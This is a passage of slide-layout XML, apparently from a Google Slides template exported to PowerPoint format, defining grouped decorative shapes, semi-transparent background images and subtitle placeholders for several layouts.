            <a:off x="148226" y="-1686"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="525" name="Google Shape;525;p21"/>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1"/>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1"/>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1"/>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1"/>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530" name="Shape 530"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="531" name="Google Shape;531;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2578675"/>
            <a:ext cx="9144000" cy="2564774"/>
            <a:chOff x="0" y="2578675"/>
            <a:chExt cx="9144000" cy="2564774"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="532" name="Google Shape;532;p22"/>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533" name="Google Shape;533;p22"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429125" y="2578675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="534" name="Google Shape;534;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="535" name="Google Shape;535;p22"/>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536" name="Google Shape;536;p22"/>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537" name="Google Shape;537;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="538" name="Google Shape;538;p22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="539" name="Google Shape;539;p22"/>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2"/>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2"/>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2"/>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3" name="Google Shape;543;p22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="544" name="Google Shape;544;p22"/>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2"/>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2"/>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2"/>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48" name="Google Shape;548;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="148226" y="-1686"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="549" name="Google Shape;549;p22"/>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2"/>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2"/>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2"/>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2"/>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4" name="Google Shape;554;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="8690726" y="3286064"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="555" name="Google Shape;555;p22"/>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2"/>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2"/>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2"/>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2"/>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0" name="Google Shape;560;p2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561" name="Google Shape;561;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857502" y="1482525"/>
            <a:ext cx="31890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2" name="Google Shape;562;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097498" y="1482525"/>
            <a:ext cx="31890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563" name="Shape 563"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="564" name="Google Shape;564;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2578675"/>
            <a:ext cx="9144000" cy="2564774"/>
            <a:chOff x="0" y="2578675"/>
            <a:chExt cx="9144000" cy="2564774"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="565" name="Google Shape;565;p23"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="4015850"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="566" name="Google Shape;566;p23"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429125" y="2578675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="567" name="Google Shape;567;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="568" name="Google Shape;568;p23"/>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569" name="Google Shape;569;p23"/>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570" name="Google Shape;570;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="571" name="Google Shape;571;p23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="572" name="Google Shape;572;p23"/>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3"/>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3"/>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3"/>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6" name="Google Shape;576;p23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="577" name="Google Shape;577;p23"/>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3"/>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3"/>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3"/>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81" name="Google Shape;581;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="148226" y="-1686"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="582" name="Google Shape;582;p23"/>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3"/>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3"/>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3"/>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3"/>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7" name="Google Shape;587;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="8690726" y="3286064"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="588" name="Google Shape;588;p23"/>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3"/>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3"/>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3"/>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3"/>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93" name="Google Shape;593;p2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594" name="Google Shape;594;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4730624" y="1234500"/>
            <a:ext cx="3693300" cy="2882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95" name="Google Shape;595;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1234500"/>
            <a:ext cx="3693300" cy="2882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96" name="Shape 596"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="29250"/>
            <a:ext cx="9144000" cy="5114199"/>
            <a:chOff x="0" y="29250"/>
            <a:chExt cx="9144000" cy="5114199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="598" name="Google Shape;598;p24"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="29250"/>
              <a:ext cx="959340" cy="869401"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="599" name="Google Shape;599;p24"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429125" y="2578675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="Google Shape;600;p2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01" name="Google Shape;601;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076679" y="2596754"/>
            <a:ext cx="2226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2" name="Google Shape;602;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458847" y="2596754"/>
            <a:ext cx="2226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3" name="Google Shape;603;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5841022" y="2596754"/>
            <a:ext cx="2226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4" name="Google Shape;604;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076678" y="2130552"/>
            <a:ext cx="22263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5" name="Google Shape;605;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458850" y="2130552"/>
            <a:ext cx="22263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6" name="Google Shape;606;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5841022" y="2130552"/>
            <a:ext cx="22263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07" name="Google Shape;607;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="608" name="Google Shape;608;p24"/>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609" name="Google Shape;609;p24"/>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610" name="Google Shape;610;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="611" name="Google Shape;611;p24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="612" name="Google Shape;612;p24"/>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4"/>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4"/>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4"/>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6" name="Google Shape;616;p24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="617" name="Google Shape;617;p24"/>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4"/>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4"/>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4"/>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21" name="Google Shape;621;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="141223" y="107853"/>
            <a:ext cx="204551" cy="1747810"/>
            <a:chOff x="1089587" y="-1610"/>
            <a:chExt cx="204551" cy="1747810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="622" name="Google Shape;622;p24"/>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4"/>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4"/>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4"/>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26" name="Shape 626"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="29250"/>
            <a:ext cx="9041589" cy="5114249"/>
            <a:chOff x="0" y="29250"/>
            <a:chExt cx="9041589" cy="5114249"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="628" name="Google Shape;628;p25"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8082250" y="29250"/>
              <a:ext cx="959340" cy="869401"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="629" name="Google Shape;629;p25"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-75050" y="2503675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="630" name="Google Shape;630;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="631" name="Google Shape;631;p25"/>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632" name="Google Shape;632;p25"/>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633" name="Google Shape;633;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719990" y="180167"/>
            <a:ext cx="7704015" cy="4761342"/>
            <a:chOff x="719990" y="180168"/>
            <a:chExt cx="7704015" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="634" name="Google Shape;634;p25"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7452040" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="635" name="Google Shape;635;p25"/>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5"/>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5"/>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5"/>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9" name="Google Shape;639;p25"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="719990" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="640" name="Google Shape;640;p25"/>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5"/>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5"/>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5"/>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44" name="Google Shape;644;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="141223" y="107853"/>
            <a:ext cx="204551" cy="1747810"/>
            <a:chOff x="1089587" y="-1610"/>
            <a:chExt cx="204551" cy="1747810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="645" name="Google Shape;645;p25"/>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5"/>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5"/>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5"/>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49" name="Google Shape;649;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50" name="Google Shape;650;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1989356" y="208082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1" name="Google Shape;651;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176435" y="208082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2" name="Google Shape;652;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1989356" y="351422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3" name="Google Shape;653;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176435" y="351422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4" name="Google Shape;654;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1989369" y="1614625"/>
            <a:ext cx="19782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5" name="Google Shape;655;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1989369" y="3048025"/>
            <a:ext cx="19782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6" name="Google Shape;656;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176444" y="1614625"/>
            <a:ext cx="19782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7" name="Google Shape;657;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176444" y="3048025"/>
            <a:ext cx="19782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58" name="Shape 658"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="659" name="Google Shape;659;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="64000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="29250"/>
            <a:ext cx="959340" cy="869401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="660" name="Google Shape;660;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="37000"/>
          </a:blip>
          <a:srcRect b="35662" l="0" r="38279" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429125" y="2578675"/>
            <a:ext cx="2714875" cy="2564774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="661" name="Google Shape;661;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="662" name="Google Shape;662;p26"/>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663" name="Google Shape;663;p26"/>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664" name="Google Shape;664;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="665" name="Google Shape;665;p26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="666" name="Google Shape;666;p26"/>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6"/>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6"/>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6"/>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0" name="Google Shape;670;p26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="671" name="Google Shape;671;p26"/>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6"/>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6"/>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6"/>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75" name="Google Shape;675;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="141223" y="107853"/>
            <a:ext cx="204551" cy="1747810"/>
            <a:chOff x="1089587" y="-1610"/>
            <a:chExt cx="204551" cy="1747810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="676" name="Google Shape;676;p26"/>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6"/>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6"/>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6"/>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0" name="Google Shape;680;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81" name="Google Shape;681;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969495" y="2018672"/>
            <a:ext cx="21495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2" name="Google Shape;682;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
